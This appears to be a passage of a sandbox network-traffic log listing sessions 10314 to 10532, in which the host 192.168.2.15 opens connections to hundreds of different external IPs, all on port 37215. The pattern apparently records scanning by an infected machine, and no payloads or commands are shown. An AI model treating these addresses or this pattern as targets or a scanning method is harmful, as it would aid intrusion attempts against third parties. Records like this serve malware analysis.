                                              10314192.168.2.153426445.171.231.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10315192.168.2.1546042222.79.82.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10316192.168.2.1549150138.92.88.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10317192.168.2.153662231.105.78.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10318192.168.2.1544894181.119.171.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10319192.168.2.1533016157.234.123.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10320192.168.2.153448431.35.217.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10321192.168.2.1543194197.222.213.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10322192.168.2.154281437.3.112.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10323192.168.2.1552138156.11.242.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10324192.168.2.1548150122.158.170.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10325192.168.2.1546248122.130.183.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10326192.168.2.154170037.3.109.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10327192.168.2.153973641.133.2.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10328192.168.2.153636494.197.29.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10329192.168.2.1552720222.35.23.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10330192.168.2.1559952222.134.101.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10331192.168.2.1541532102.105.113.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10332192.168.2.153414445.63.71.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10333192.168.2.1550628122.98.216.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10334192.168.2.154435445.33.27.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10335192.168.2.154124441.146.152.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10336192.168.2.155345245.57.231.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10337192.168.2.1550884121.157.37.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10338192.168.2.1556802157.45.253.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10339192.168.2.1553586157.12.128.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10340192.168.2.155792031.6.56.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10341192.168.2.155403845.156.103.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10342192.168.2.1544940186.40.109.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10343192.168.2.153410241.104.141.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10344192.168.2.1552302138.229.65.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10345192.168.2.153771441.120.134.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10346192.168.2.156052045.229.64.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10347192.168.2.1554550122.142.149.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10348192.168.2.1543692157.52.63.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10349192.168.2.1557512156.115.178.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10350192.168.2.1545804122.95.21.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10351192.168.2.155730241.154.216.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10352192.168.2.1535954190.187.103.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10353192.168.2.1555532197.157.204.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10354192.168.2.1551106138.73.13.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10355192.168.2.155562231.215.129.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10356192.168.2.153290694.174.120.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10357192.168.2.1548894186.23.98.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10358192.168.2.1550080181.156.177.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10359192.168.2.155104441.161.2.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10360192.168.2.1535528102.34.84.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10361192.168.2.153316631.189.166.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10362192.168.2.1534468156.200.223.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10363192.168.2.1534496121.138.251.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10364192.168.2.1545910222.31.74.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10365192.168.2.1554466190.75.251.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10366192.168.2.1547112190.41.152.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10367192.168.2.1550212102.131.112.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10368192.168.2.1546194222.217.152.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10369192.168.2.1540402156.82.114.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10370192.168.2.1549598138.41.121.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10371192.168.2.155515041.91.135.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10372192.168.2.1543204121.200.34.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10373192.168.2.155267437.220.241.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10374192.168.2.155423441.103.126.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10375192.168.2.1554402186.244.215.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10376192.168.2.153643231.180.238.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10377192.168.2.154593445.245.153.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10378192.168.2.1553656102.103.73.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10379192.168.2.1545712156.207.121.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10380192.168.2.1537332138.0.131.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10381192.168.2.1536492122.25.179.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10382192.168.2.153410845.28.176.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10383192.168.2.1549558222.17.179.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10384192.168.2.1544990197.223.42.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10385192.168.2.1535788121.48.218.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10386192.168.2.154338441.125.232.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10387192.168.2.153734645.13.223.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10388192.168.2.1552744157.100.248.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10389192.168.2.153828486.87.44.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10390192.168.2.1540114157.207.125.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10391192.168.2.1542950197.246.104.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10392192.168.2.155479237.213.84.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10393192.168.2.1555472102.214.198.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10394192.168.2.1535578122.17.85.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10395192.168.2.1548100190.193.164.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10396192.168.2.1544920222.251.134.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10397192.168.2.1533332133.197.163.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10398192.168.2.1537214121.230.0.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10399192.168.2.154658645.10.10.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10400192.168.2.153827631.10.211.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10401192.168.2.1560158157.37.70.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10402192.168.2.1555580156.186.176.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10403192.168.2.1547012197.71.173.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10404192.168.2.1555766122.226.162.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10405192.168.2.1554630197.108.221.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10406192.168.2.155396053.144.70.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10407192.168.2.154313245.245.185.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10408192.168.2.1544500156.181.144.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10409192.168.2.1543126181.119.134.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10410192.168.2.1559302222.190.140.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10411192.168.2.154329837.177.124.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10412192.168.2.1539846157.67.43.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10413192.168.2.154751041.90.123.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10414192.168.2.155979045.249.202.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10415192.168.2.1550934186.23.117.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10416192.168.2.1553282121.38.209.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10417192.168.2.1545870181.18.93.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10418192.168.2.1537666222.16.77.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10419192.168.2.1541236222.188.59.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10420192.168.2.1539322186.133.58.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10421192.168.2.155300296.89.160.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10422192.168.2.155743454.8.56.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10423192.168.2.154382045.246.110.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10424192.168.2.1540830197.210.68.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10425192.168.2.153290641.50.191.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10426192.168.2.156066637.145.68.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10427192.168.2.1539422186.23.66.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10428192.168.2.153407094.225.63.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10429192.168.2.1550514181.235.77.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10430192.168.2.1545804138.120.16.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10431192.168.2.1542998190.216.70.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10432192.168.2.154364831.83.174.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10433192.168.2.153330041.204.148.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10434192.168.2.155243631.40.10.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10435192.168.2.1539070197.58.116.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10436192.168.2.155539431.243.191.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10437192.168.2.1549630102.221.188.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10438192.168.2.1536800157.4.234.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10439192.168.2.1554492186.200.191.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10440192.168.2.1535032186.136.227.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10441192.168.2.1557884121.228.165.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10442192.168.2.1540614109.69.4.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10443192.168.2.155419431.51.194.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10444192.168.2.155168037.144.29.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10445192.168.2.155605894.118.87.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10446192.168.2.1560176190.213.226.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10447192.168.2.155941694.242.194.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10448192.168.2.1546446181.248.151.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10449192.168.2.154987041.106.105.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10450192.168.2.1538052156.226.111.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10451192.168.2.155824845.130.25.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10452192.168.2.1534674102.142.69.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10453192.168.2.155307694.135.105.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10454192.168.2.155407045.219.150.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10455192.168.2.1542652190.101.26.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10456192.168.2.1545582102.250.207.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10457192.168.2.1549842181.152.227.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10458192.168.2.153758294.44.181.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10459192.168.2.1555524122.199.107.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10460192.168.2.154513041.32.106.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10461192.168.2.1558474122.213.232.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10462192.168.2.154122031.196.226.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10463192.168.2.1554176190.153.157.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10464192.168.2.1559794190.150.231.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10465192.168.2.1550144122.122.48.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10466192.168.2.1550374180.17.209.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10467192.168.2.1553784157.140.174.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10468192.168.2.1553220138.113.62.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10469192.168.2.1552806156.153.189.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10470192.168.2.1538510181.186.195.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10471192.168.2.1549150138.11.18.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10472192.168.2.1540092181.25.57.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10473192.168.2.1532856197.201.60.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10474192.168.2.1556930121.41.206.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10475192.168.2.1551032121.175.52.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10476192.168.2.1537672138.78.21.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10477192.168.2.1547364222.60.178.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10478192.168.2.1557104138.213.255.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10479192.168.2.1557800197.194.193.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10480192.168.2.153555631.3.175.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10481192.168.2.1546098186.92.119.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10482192.168.2.155814645.56.244.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10483192.168.2.1534358102.250.199.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10484192.168.2.1544776102.67.81.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10485192.168.2.1549668121.163.59.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10486192.168.2.154901641.141.102.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10487192.168.2.155858231.10.109.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10488192.168.2.1533866156.240.175.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10489192.168.2.1547856157.159.159.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10490192.168.2.1547580157.148.171.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10491192.168.2.1551336161.79.205.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10492192.168.2.1536498190.5.107.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10493192.168.2.1555102103.66.29.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10494192.168.2.1552298186.63.240.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10495192.168.2.1555964102.70.225.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10496192.168.2.1543792121.184.76.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10497192.168.2.1550406102.103.192.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10498192.168.2.1534742102.187.146.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10499192.168.2.1558940102.203.113.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10500192.168.2.155554237.231.38.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10501192.168.2.1556952181.66.45.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10502192.168.2.1538402190.183.136.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10503192.168.2.1542760138.137.233.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10504192.168.2.155828037.7.163.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10505192.168.2.1559670113.101.108.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10506192.168.2.1559074157.25.98.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10507192.168.2.1557772197.206.186.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10508192.168.2.1557956181.118.11.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10509192.168.2.1558748157.43.75.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10510192.168.2.1553936190.50.58.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10511192.168.2.1534018190.135.153.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10512192.168.2.1559996138.49.251.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10513192.168.2.154321294.0.41.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10514192.168.2.1548278112.147.12.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10515192.168.2.154155040.154.54.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10516192.168.2.1537934156.38.174.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10517192.168.2.1553468197.146.61.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10518192.168.2.1543584157.116.112.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10519192.168.2.1534190138.82.229.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10520192.168.2.1542086181.133.18.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10521192.168.2.1533888169.208.98.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10522192.168.2.1538370190.147.228.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10523192.168.2.154551431.50.112.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10524192.168.2.154026831.25.124.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10525192.168.2.1546278222.158.81.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10526192.168.2.153950231.135.230.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10527192.168.2.1536428222.4.208.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10528192.168.2.1535132190.116.97.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10529192.168.2.1552410157.154.246.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10530192.168.2.1556708197.163.63.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10531192.168.2.154635894.190.113.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10532192.168.2.1552882197.210.26.10737215
